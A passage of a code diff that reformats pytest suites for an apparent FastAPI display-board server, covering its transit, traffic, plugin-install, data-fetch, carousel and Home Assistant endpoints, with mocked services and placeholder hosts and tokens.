+            patch("src.api_server.find_nearby_muni_stops", new_callable=AsyncMock, return_value=nearby_data),
+        ):
             resp = client.get("/muni/stops/search?address=Market+St")
         assert resp.status_code == 200
         assert "geocoded_location" in resp.json()
@@ -293,6 +334,7 @@ class TestMuniStops:
 
     def test_search_muni_geocode_error(self, client):
         import requests as req
+
         with patch("requests.get", side_effect=req.exceptions.ConnectionError("fail")):
             resp = client.get("/muni/stops/search?address=Test")
         assert resp.status_code == 503
@@ -301,6 +343,7 @@ class TestMuniStops:
 # ---------------------------------------------------------------------------
 # Traffic Geocode & Validate (lines 2556-2680)
 # ---------------------------------------------------------------------------
+
 
 class TestTrafficEndpoints:
     def test_geocode_success(self, client):
@@ -332,13 +375,18 @@ class TestTrafficEndpoints:
     def test_validate_route_success(self, client):
         mock_ts = Mock()
         mock_ts.fetch_traffic_data.return_value = {"static_duration": 600, "static_duration_minutes": 10}
-        with patch("src.config.Config.GOOGLE_ROUTES_API_KEY", "test_key"), \
-             patch("src.utils.traffic.TrafficSource", return_value=mock_ts):
-            resp = client.post("/traffic/routes/validate", json={
-                "origin": "40.7128,-74.0060",
-                "destination": "40.7580,-73.9855",
-                "destination_name": "MIDTOWN",
-            })
+        with (
+            patch("src.config.Config.GOOGLE_ROUTES_API_KEY", "test_key"),
+            patch("src.utils.traffic.TrafficSource", return_value=mock_ts),
+        ):
+            resp = client.post(
+                "/traffic/routes/validate",
+                json={
+                    "origin": "40.7128,-74.0060",
+                    "destination": "40.7580,-73.9855",
+                    "destination_name": "MIDTOWN",
+                },
+            )
         assert resp.status_code == 200
         assert resp.json()["valid"] is True
 
@@ -354,15 +402,19 @@ class TestTrafficEndpoints:
     def test_validate_route_empty_data(self, client):
         mock_ts = Mock()
         mock_ts.fetch_traffic_data.return_value = None
-        with patch("src.config.Config.GOOGLE_ROUTES_API_KEY", "test_key"), \
-             patch("src.utils.traffic.TrafficSource", return_value=mock_ts):
+        with (
+            patch("src.config.Config.GOOGLE_ROUTES_API_KEY", "test_key"),
+            patch("src.utils.traffic.TrafficSource", return_value=mock_ts),
+        ):
             resp = client.post("/traffic/routes/validate", json={"origin": "a", "destination": "b"})
         assert resp.status_code == 200
         assert resp.json()["valid"] is False
 
     def test_validate_route_exception(self, client):
-        with patch("src.config.Config.GOOGLE_ROUTES_API_KEY", "test_key"), \
-             patch("src.utils.traffic.TrafficSource", side_effect=Exception("boom")):
+        with (
+            patch("src.config.Config.GOOGLE_ROUTES_API_KEY", "test_key"),
+            patch("src.utils.traffic.TrafficSource", side_effect=Exception("boom")),
+        ):
             resp = client.post("/traffic/routes/validate", json={"origin": "a", "destination": "b"})
         assert resp.status_code == 200
         assert resp.json()["valid"] is False
@@ -371,6 +423,7 @@ class TestTrafficEndpoints:
 # ---------------------------------------------------------------------------
 # Plugin Data (lines 4653-4696)
 # ---------------------------------------------------------------------------
+
 
 class TestPluginData:
     def test_get_plugin_data_success(self, client):
@@ -387,8 +440,10 @@ class TestPluginData:
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.is_enabled.return_value = True
         mock_registry.fetch_plugin_data.return_value = mock_result
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.get("/plugins/test_plugin/data")
         assert resp.status_code == 200
         body = resp.json()
@@ -401,16 +456,20 @@ class TestPluginData:
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.is_enabled.return_value = True
         mock_registry.fetch_plugin_data.return_value = mock_result
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.get("/plugins/test_plugin/data")
         assert resp.status_code == 503
 
     def test_get_plugin_data_not_found(self, client):
         mock_registry = Mock()
         mock_registry.get_plugin.return_value = None
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.get("/plugins/nonexistent/data")
         assert resp.status_code == 404
 
@@ -418,8 +477,10 @@ class TestPluginData:
         mock_registry = Mock()
         mock_registry.get_plugin.return_value = Mock()
         mock_registry.is_enabled.return_value = False
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.get("/plugins/test_plugin/data")
         assert resp.status_code == 400
 
@@ -433,12 +494,15 @@ class TestPluginData:
 # Plugin Updates/Install (lines 4823-4949)
 # ---------------------------------------------------------------------------
 
+
 class TestPluginManagement:
     def test_trigger_update_check(self, client):
         mock_registry = Mock()
         mock_registry.check_for_updates.return_value = {"plugin_a": True, "plugin_b": False}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/updates/check")
         assert resp.status_code == 200
         assert resp.json()["checked"] == 2
@@ -450,25 +514,31 @@ class TestPluginManagement:
         assert resp.status_code == 503
 
     def test_update_plugin_success(self, client):
-        mock_source = Mock(source_type="external", local_path="/fake/path", repository_url="https://example.com/repo.git")
+        mock_source = Mock(
+            source_type="external", local_path="/fake/path", repository_url="https://example.com/repo.git"
+        )
         mock_registry = Mock()
         mock_registry.get_plugin_source.return_value = mock_source
         mock_registry.reload_plugin.return_value = Mock()
         mock_registry._update_status = {"test_plugin": True}
 
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("pathlib.Path.is_dir", return_value=True), \
-             patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")), \
-             patch("src.plugins.sources.clone_or_update_repo", return_value=(True, None)):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("pathlib.Path.is_dir", return_value=True),
+            patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")),
+            patch("src.plugins.sources.clone_or_update_repo", return_value=(True, None)),
+        ):
             resp = client.post("/plugins/test_plugin/update")
         assert resp.status_code == 200
 
     def test_update_plugin_not_found(self, client):
         mock_registry = Mock()
         mock_registry.get_plugin_source.return_value = None
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/nonexistent/update")
         assert resp.status_code == 404
 
@@ -476,8 +546,10 @@ class TestPluginManagement:
         mock_source = Mock(source_type="builtin")
         mock_registry = Mock()
         mock_registry.get_plugin_source.return_value = mock_source
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/weather/update")
         assert resp.status_code == 400
 
@@ -496,11 +568,13 @@ class TestPluginManagement:
             captured_url.append(url)
             return (True, "")
 
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("pathlib.Path.is_dir", return_value=True), \
-             patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")), \
-             patch("src.plugins.sources.clone_or_update_repo", side_effect=capture_clone):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("pathlib.Path.is_dir", return_value=True),
+            patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")),
+            patch("src.plugins.sources.clone_or_update_repo", side_effect=capture_clone),
+        ):
             resp = client.post("/plugins/test_plugin/update")
         assert resp.status_code == 200
         # The endpoint must pass "" not source.repository_url
@@ -515,11 +589,13 @@ class TestPluginManagement:
         mock_registry.reload_plugin.return_value = Mock()
         mock_registry._update_status = {"plugin_a": True}
 
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("pathlib.Path.is_dir", return_value=True), \
-             patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")), \
-             patch("src.plugins.sources.clone_or_update_repo", return_value=(True, "")):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("pathlib.Path.is_dir", return_value=True),
+            patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")),
+            patch("src.plugins.sources.clone_or_update_repo", return_value=(True, "")),
+        ):
             resp = client.post("/plugins/updates/apply")
         assert resp.status_code == 200
         data = resp.json()
@@ -530,8 +606,10 @@ class TestPluginManagement:
         """Returns 200 with empty lists when nothing needs updating."""
         mock_registry = Mock()
         mock_registry.get_update_status.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/updates/apply")
         assert resp.status_code == 200
         assert resp.json()["updated"] == []
@@ -556,11 +634,13 @@ class TestPluginManagement:
                 return (False, "git fetch error")
             return (True, "")
 
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("pathlib.Path.is_dir", return_value=True), \
-             patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")), \
-             patch("src.plugins.sources.clone_or_update_repo", side_effect=fake_clone):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("pathlib.Path.is_dir", return_value=True),
+            patch("src.plugins.sources.get_external_plugins_dir", return_value=Path("/fake")),
+            patch("src.plugins.sources.clone_or_update_repo", side_effect=fake_clone),
+        ):
             resp = client.post("/plugins/updates/apply")
         assert resp.status_code == 200
         data = resp.json()
@@ -575,18 +655,24 @@ class TestPluginManagement:
     def test_install_plugin_success(self, client):
         mock_registry = Mock()
         mock_registry.install_from_git.return_value = []
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("src.plugins.sources.repo_name_from_url", return_value="fiestaboard-plugin-test"), \
-             patch("src.plugins.sources.plugin_id_from_repo_name", return_value="test"):
-            resp = client.post("/plugins/install", json={"repository": "https://github.com/example/fiestaboard-plugin-test"})
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("src.plugins.sources.repo_name_from_url", return_value="fiestaboard-plugin-test"),
+            patch("src.plugins.sources.plugin_id_from_repo_name", return_value="test"),
+        ):
+            resp = client.post(
+                "/plugins/install", json={"repository": "https://github.com/example/fiestaboard-plugin-test"}
+            )
         assert resp.status_code == 200
 
     def test_install_plugin_errors(self, client):
         mock_registry = Mock()
         mock_registry.install_from_git.return_value = ["Clone failed"]
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/install", json={"repository": "https://github.com/example/repo"})
         assert resp.status_code == 400
 
@@ -598,29 +684,39 @@ class TestPluginManagement:
     def test_install_plugin_arbitrary_branch_accepted(self, client):
         mock_registry = Mock()
         mock_registry.install_from_git.return_value = []
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry), \
-             patch("src.plugins.sources.repo_name_from_url", return_value="repo"), \
-             patch("src.plugins.sources.plugin_id_from_repo_name", return_value="repo"):
-            resp = client.post("/plugins/install", json={
-                "repository": "https://github.com/example/repo",
-                "branch": "release/2.0",
-            })
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+            patch("src.plugins.sources.repo_name_from_url", return_value="repo"),
+            patch("src.plugins.sources.plugin_id_from_repo_name", return_value="repo"),
+        ):
+            resp = client.post(
+                "/plugins/install",
+                json={
+                    "repository": "https://github.com/example/repo",
+                    "branch": "release/2.0",
+                },
+            )
         assert resp.status_code == 200
 
     def test_install_plugin_invalid_branch_rejected(self, client):
         with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
-            resp = client.post("/plugins/install", json={
-                "repository": "https://github.com/example/repo",
-                "branch": "-bad-branch",
-            })
+            resp = client.post(
+                "/plugins/install",
+                json={
+                    "repository": "https://github.com/example/repo",
+                    "branch": "-bad-branch",
+                },
+            )
         assert resp.status_code == 400
 
     def test_install_plugin_error_detail_in_response(self, client):
         mock_registry = Mock()
         mock_registry.install_from_git.return_value = ["fatal: repository not found"]
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_plugin_registry", return_value=mock_registry):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_plugin_registry", return_value=mock_registry),
+        ):
             resp = client.post("/plugins/install", json={"repository": "https://github.com/example/repo"})
         assert resp.status_code == 400
         assert "repository not found" in resp.json()["detail"]
@@ -629,6 +725,7 @@ class TestPluginManagement:
 # ---------------------------------------------------------------------------
 # Generic Data Test Fetch (lines 4985-5055)
 # ---------------------------------------------------------------------------
+
 
 class TestGenericDataTestFetch:
     # Public IP returned by the mocked DNS resolver (93.184.216.34 = example.com)
@@ -641,52 +738,66 @@ class TestGenericDataTestFetch:
         mock_resp.json.return_value = {"key": "value"}
         mock_cm = Mock()
         mock_cm.get_general.return_value = {"timezone": "UTC"}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", return_value=mock_resp):
-            resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/data", "format": "json"})
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", return_value=mock_resp),
+        ):
+            resp = client.post(
+                "/generic-data/test-fetch", json={"url": "https://api.example.com/data", "format": "json"}
+            )
         assert resp.status_code == 200
         assert resp.json()["ok"] is True
 
     def test_fetch_no_url(self, client):
         mock_cm = Mock()
         mock_cm.get_general.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": ""})
         assert resp.status_code == 400
 
     def test_fetch_invalid_url(self, client):
         mock_cm = Mock()
         mock_cm.get_general.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "ftp://bad"})
         assert resp.status_code == 400
 
     def test_fetch_timeout(self, client):
         import requests as req
+
         mock_cm = Mock()
         mock_cm.get_general.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", side_effect=req.exceptions.Timeout("timeout")):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", side_effect=req.exceptions.Timeout("timeout")),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/slow"})
         assert resp.status_code == 504
 
     def test_fetch_connection_error(self, client):
         import requests as req
+
         mock_cm = Mock()
         mock_cm.get_general.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", side_effect=req.exceptions.ConnectionError("conn")):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", side_effect=req.exceptions.ConnectionError("conn")),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/bad"})
         assert resp.status_code == 502
 
@@ -696,10 +807,12 @@ class TestGenericDataTestFetch:
         mock_resp.content = b"x" * (1_048_577)
         mock_cm = Mock()
         mock_cm.get_general.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", return_value=mock_resp):
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", return_value=mock_resp),
+        ):
             resp = client.post("/generic-data/test-fetch", json={"url": "https://api.example.com/big"})
         assert resp.status_code == 400
 
@@ -710,17 +823,22 @@ class TestGenericDataTestFetch:
         mock_resp.json.return_value = {"ok": True}
         mock_cm = Mock()
         mock_cm.get_general.return_value = {}
-        with patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True), \
-             patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]), \
-             patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO), \
-             patch("requests.request", return_value=mock_resp):
-            resp = client.post("/generic-data/test-fetch", json={
-                "url": "https://api.example.com/data",
-                "method": "POST",
-                "body": '{"q": "test"}',
-                "headers": [{"name": "Authorization", "value": "Bearer test_token"}],
-            })
+        with (
+            patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True),
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server._get_generic_data_allowed_hosts", return_value=["example.com"]),
+            patch("socket.getaddrinfo", return_value=self._PUBLIC_ADDR_INFO),
+            patch("requests.request", return_value=mock_resp),
+        ):
+            resp = client.post(
+                "/generic-data/test-fetch",
+                json={
+                    "url": "https://api.example.com/data",
+                    "method": "POST",
+                    "body": '{"q": "test"}',
+                    "headers": [{"name": "Authorization", "value": "Bearer test_token"}],
+                },
+            )
         assert resp.status_code == 200
 
 
@@ -728,14 +846,17 @@ class TestGenericDataTestFetch:
 # Carousel error paths (lines 3906-3940)
 # ---------------------------------------------------------------------------
 
+
 class TestCarouselErrors:
     def test_create_carousel_value_error(self, client):
         mock_cs = Mock()
         mock_cs.create_carousel.side_effect = ValueError("Duplicate name")
         mock_ps = Mock()
         mock_ps.get_page.return_value = Mock()
-        with patch("src.api_server.get_carousel_service", return_value=mock_cs), \
-             patch("src.api_server.get_page_service", return_value=mock_ps):
+        with (
+            patch("src.api_server.get_carousel_service", return_value=mock_cs),
+            patch("src.api_server.get_page_service", return_value=mock_ps),
+        ):
             resp = client.post("/carousels", json={"name": "Test", "page_ids": ["p1"]})
         assert resp.status_code == 400
         assert "Duplicate" in resp.json()["detail"]
@@ -745,8 +866,10 @@ class TestCarouselErrors:
         mock_cs.update_carousel.side_effect = ValueError("Invalid")
         mock_ps = Mock()
         mock_ps.get_page.return_value = Mock()
-        with patch("src.api_server.get_carousel_service", return_value=mock_cs), \
-             patch("src.api_server.get_page_service", return_value=mock_ps):
+        with (
+            patch("src.api_server.get_carousel_service", return_value=mock_cs),
+            patch("src.api_server.get_page_service", return_value=mock_ps),
+        ):
             resp = client.put("/carousels/c1", json={"name": "Updated", "page_ids": ["p1"]})
         assert resp.status_code == 400
 
@@ -754,6 +877,7 @@ class TestCarouselErrors:
 # ---------------------------------------------------------------------------
 # Home Assistant entities (lines 4243-4280)
 # ---------------------------------------------------------------------------
+
 
 class TestHomeAssistant:
     def test_get_entities_success(self, client):
@@ -766,8 +890,10 @@ class TestHomeAssistant:
         mock_resp.json.return_value = [
             {"entity_id": "sensor.temp", "state": "72", "attributes": {"friendly_name": "Temperature"}},
         ]
-        with patch("src.utils.home_assistant.get_home_assistant_source", return_value=mock_ha), \
-             patch("requests.get", return_value=mock_resp):
+        with (
+            patch("src.utils.home_assistant.get_home_assistant_source", return_value=mock_ha),
+            patch("requests.get", return_value=mock_resp),
+        ):
             resp = client.get("/home-assistant/entities")
         assert resp.status_code == 200
         assert len(resp.json()["entities"]) == 1
@@ -782,8 +908,10 @@ class TestHomeAssistant:
         mock_ha.base_url = "http://ha.local:8123"
         mock_ha.headers = {}
         mock_ha.timeout = 10
-        with patch("src.utils.home_assistant.get_home_assistant_source", return_value=mock_ha), \
-             patch("requests.get", side_effect=Exception("Connection refused")):
+        with (
+            patch("src.utils.home_assistant.get_home_assistant_source", return_value=mock_ha),
+            patch("requests.get", side_effect=Exception("Connection refused")),
+        ):
             resp = client.get("/home-assistant/entities")
         assert resp.status_code == 503
 
@@ -792,11 +920,13 @@ class TestHomeAssistant:
 # Deprecated compat endpoints (lines 1051-1099)
 # ---------------------------------------------------------------------------
 
+
 class TestDeprecatedCompat:
     def test_get_board_config_compat(self, client):
         """Test the deprecated get_board_config_compat function directly."""
-        from src.api_server import get_board_config_compat
         import asyncio
+
+        from src.api_server import get_board_config_compat
 
         mock_cm = Mock()
         mock_cm.get_board.return_value = {"api_mode": "local", "host": "192.168.1.100"}
@@ -810,19 +940,20 @@ class TestDeprecatedCompat:
 
     def test_update_board_config_compat(self, client):
         """Test the deprecated update_board_config_compat function directly."""
-        from src.api_server import update_board_config_compat
         import asyncio
+
+        from src.api_server import update_board_config_compat
 
         mock_cm = Mock()
         mock_cm.get_board.return_value = {"api_mode": "local"}
         mock_cm._mask_sensitive.return_value = {"api_mode": "local"}
         mock_response = Mock()
         mock_response.headers = {}
-        with patch("src.api_server.get_config_manager", return_value=mock_cm), \
-             patch("src.api_server.get_service", return_value=None), \
-             patch("src.config.Config.reload"):
-            result = asyncio.run(
-                update_board_config_compat({"api_mode": "local"}, mock_response)
-            )
+        with (
+            patch("src.api_server.get_config_manager", return_value=mock_cm),
+            patch("src.api_server.get_service", return_value=None),
+            patch("src.config.Config.reload"),
+        ):
+            result = asyncio.run(update_board_config_compat({"api_mode": "local"}, mock_response))
         assert "status" in result
         assert mock_response.headers["Deprecation"] == "true"

--- a/tests/test_api_extended.py
+++ b/tests/test_api_extended.py
@@ -4,9 +4,11 @@ Covers config endpoints, plugin endpoints, template endpoints, settings endpoint
 pages endpoints, schedule endpoints, cache, service lifecycle, and error paths.
 """
 
-import pytest
 from unittest.mock import Mock, patch
+
+import pytest
 from fastapi.testclient import TestClient
+
 from src.api_server import app
 
 
@@ -60,7 +62,10 @@ def mock_settings_service():
 
         board_settings = Mock()
         board_settings.boards = [{"id": "b1", "device_type": "flagship"}]
-        board_settings.to_dict.return_value = {"board_type": "black", "boards": [{"id": "b1", "device_type": "flagship"}]}
+        board_settings.to_dict.return_value = {
+            "board_type": "black",
+            "boards": [{"id": "b1", "device_type": "flagship"}],
+        }
         ss.get_board_settings.return_value = board_settings
 
         polling = Mock()
@@ -220,6 +225,7 @@ def mock_display_service():
             {"type": "weather", "available": True, "description": "Weather", "source": "plugin"},
         ]
         from src.displays.service import DisplayResult
+
         ds.get_display.return_value = DisplayResult(
             display_type="weather",
             formatted="Sunny 72F",
@@ -247,8 +253,7 @@ def mock_template_engine():
 @pytest.fixture
 def mock_plugin_registry():
     """Mock the plugin registry."""
-    with patch("src.api_server.get_plugin_registry") as mock_get, \
-         patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
+    with patch("src.api_server.get_plugin_registry") as mock_get, patch("src.api_server.PLUGIN_SYSTEM_AVAILABLE", True):
         reg = Mock()
         reg.list_plugins.return_value = [
             {"id": "weather", "name": "Weather", "enabled": True},
@@ -274,6 +279,7 @@ def mock_plugin_registry():
         reg.disable_plugin.return_value = True
         reg.set_plugin_config.return_value = []
         from src.plugins.base import PluginResult
+
         reg.fetch_plugin_data.return_value = PluginResult(
             available=True,
             data={"temperature": 72},
@@ -309,6 +315,7 @@ def mock_service():
 # ============================================================
 # Root / Health / Version / Status
 # ============================================================
+
 
 class TestRootAndHealth:
     def test_root(self, client):
@@ -363,6 +370,7 @@ class TestRootAndHealth:
 # ============================================================
 # Config Endpoints
 # ============================================================
+
 
 class TestConfigEndpoints:
     def test_get_config(self, client):
@@ -429,29 +437,38 @@ class TestConfigEndpoints:
 
 class TestBoardConnectionTest:
     def test_test_board_local_missing_key(self, client):
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "host": "192.168.1.100",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "host": "192.168.1.100",
+            },
+        )
         assert response.status_code == 200
         data = response.json()
         assert data["success"] is False
         assert "API key is required" in data["message"]
 
     def test_test_board_local_missing_host(self, client):
-        response = client.post("/config/board/test", json={
-            "api_mode": "local",
-            "local_api_key": "test_key_123",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "local",
+                "local_api_key": "test_key_123",
+            },
+        )
         assert response.status_code == 200
         data = response.json()
         assert data["success"] is False
         assert "host" in data["message"].lower()
 
     def test_test_board_cloud_missing_key(self, client):
-        response = client.post("/config/board/test", json={
-            "api_mode": "cloud",
-        })
+        response = client.post(
+            "/config/board/test",
+            json={
+                "api_mode": "cloud",
+            },
+        )
         assert response.status_code == 200
         assert response.json()["success"] is False
 
@@ -459,6 +476,7 @@ class TestBoardConnectionTest:
 # ============================================================
 # Settings Endpoints
 # ============================================================
+
 
 class TestSettingsEndpoints:
     def test_get_transition_settings(self, client, mock_settings_service):
@@ -642,6 +660,7 @@ class TestSettingsEndpoints:
 # Plugin Endpoints
 # ============================================================
 
+
 class TestPluginEndpoints:
     def test_list_plugins(self, client, mock_plugin_registry, mock_config_manager):
         response = client.get("/plugins")
@@ -677,11 +696,8 @@ class TestPluginEndpoints:
         assert response.status_code == 404
 
     def test_update_plugin_config(self, client, mock_plugin_registry, mock_config_manager):
-        with patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
-            response = client.put("/plugins/weather/config", json={
-                "config": {"api_key": "test_key_abc123"}
-            })
+        with patch("src.api_server.reset_display_service"), patch("src.api_server.reset_template_engine"):
+            response = client.put("/plugins/weather/config", json={"config": {"api_key": "test_key_abc123"}})
         assert response.status_code == 200
         data = response.json()
         assert data["status"] == "success"
@@ -702,8 +718,7 @@ class TestPluginEndpoints:
         assert response.status_code == 503
 
     def test_enable_plugin(self, client, mock_plugin_registry, mock_config_manager):
-        with patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with patch("src.api_server.reset_display_service"), patch("src.api_server.reset_template_engine"):
             response = client.post("/plugins/weather/enable")
         assert response.status_code == 200
         assert response.json()["enabled"] is True
@@ -719,8 +734,7 @@ class TestPluginEndpoints:
         assert response.status_code == 400
 
     def test_disable_plugin(self, client, mock_plugin_registry, mock_config_manager):
-        with patch("src.api_server.reset_display_service"), \
-             patch("src.api_server.reset_template_engine"):
+        with patch("src.api_server.reset_display_service"), patch("src.api_server.reset_template_engine"):
